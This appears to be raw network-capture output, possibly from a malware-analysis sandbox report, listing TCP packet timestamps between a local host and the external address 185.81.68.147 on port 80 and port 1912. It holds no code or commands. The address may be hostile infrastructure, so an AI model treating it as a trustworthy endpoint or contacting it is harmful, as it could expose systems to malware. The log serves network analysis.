                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.409164906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.409841061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.409944057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.409998894 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.410700083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.410806894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.410883904 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.411550999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.411623001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.411734104 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.412441969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.412564039 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.412611961 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.413296938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.413430929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.413486004 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.414200068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.414307117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.414351940 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.415055037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.415205956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.415297985 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.415937901 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.416028023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.416081905 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.416809082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.416923046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.417085886 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.417706013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.417857885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.417916059 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.418639898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.418653965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.418705940 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.419459105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.419539928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.419712067 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.420315027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.420422077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.420471907 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.421236038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.421293020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.421557903 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.422092915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.422188997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.422240973 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.422957897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.465260983 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.494323969 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.497395992 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.569324970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.569345951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.569468021 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.569580078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.569720030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.569778919 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.570559025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.570657969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.570720911 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.571398020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.571568966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.571839094 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.572201014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.572320938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.572384119 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.573086977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.573216915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.573270082 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.573962927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.574085951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.574851036 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.574862003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.574944973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.575032949 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.575731993 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.575776100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.575829983 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.576636076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.576746941 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.576805115 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.577477932 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.577613115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.578352928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.578406096 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.578471899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.579272032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.579328060 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.579385042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.579427004 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.580132008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.580245018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.580291986 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.581075907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.581104994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.581172943 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.581880093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.582048893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.582811117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.582834005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.582915068 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.583710909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.583820105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.583878994 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.584542990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.584631920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.584935904 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.585372925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.585484028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.585540056 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.586296082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.586417913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.586541891 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.587343931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.587446928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.587493896 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.588011980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.588135004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.588185072 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.588905096 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.589004993 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.589114904 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.591686964 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.591804028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.591816902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.591829062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.591876030 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.591883898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.591912985 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.591941118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.592716932 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.592787027 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.592801094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.592854023 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.593374968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.593466043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.593508959 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.594167948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.594297886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.594357014 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.595046043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.595175982 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.595226049 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.595904112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.596018076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.596060991 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.596787930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.596935987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.596977949 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.597700119 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.597830057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.598133087 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.598586082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.598705053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.598779917 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.599419117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.599544048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.599577904 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.600330114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.600421906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.600456953 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.601201057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.601346970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.601386070 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.602061987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.602207899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.602289915 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.602947950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.603116035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.603830099 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.603832960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.603914976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.603955984 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.604654074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.604770899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.604885101 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.605591059 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.605717897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.605765104 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.606424093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.606575966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.606621981 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.607326984 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.607443094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.607487917 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.608206034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.608333111 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.608382940 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.609042883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.609133959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.609180927 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.609924078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.610100985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.610153913 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.610793114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.610922098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.610971928 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.611664057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.611778975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.611828089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.612597942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.612716913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.612765074 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.613478899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.613615990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.613665104 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.614554882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.614626884 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.614675999 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.615160942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.617268085 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.668395042 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.761303902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.761481047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.761564016 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.761733055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.761923075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.761965990 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.762653112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.762676001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.763278961 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.763499022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.763603926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.764417887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.764463902 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.764601946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.764799118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.765256882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.765364885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.766153097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.766200066 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.766230106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.766999960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.767049074 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.767160892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.767810106 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.768054962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.768151045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.768770933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.768814087 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.768867970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.769623041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.769669056 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.769714117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.769752026 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.770502090 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.770658016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.770705938 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.771425962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.771482944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.772262096 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.772306919 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.772345066 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.773199081 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.773230076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.773241043 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.774014950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.774058104 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.774074078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.774108887 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.774934053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.775054932 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.775099039 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.775799990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.775862932 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.775913000 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.776681900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.776746988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.776794910 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.777523041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.777704954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.778405905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.778455019 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.778467894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.779282093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.779340982 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.779402018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.779783010 CET4972380192.168.2.10185.81.68.147
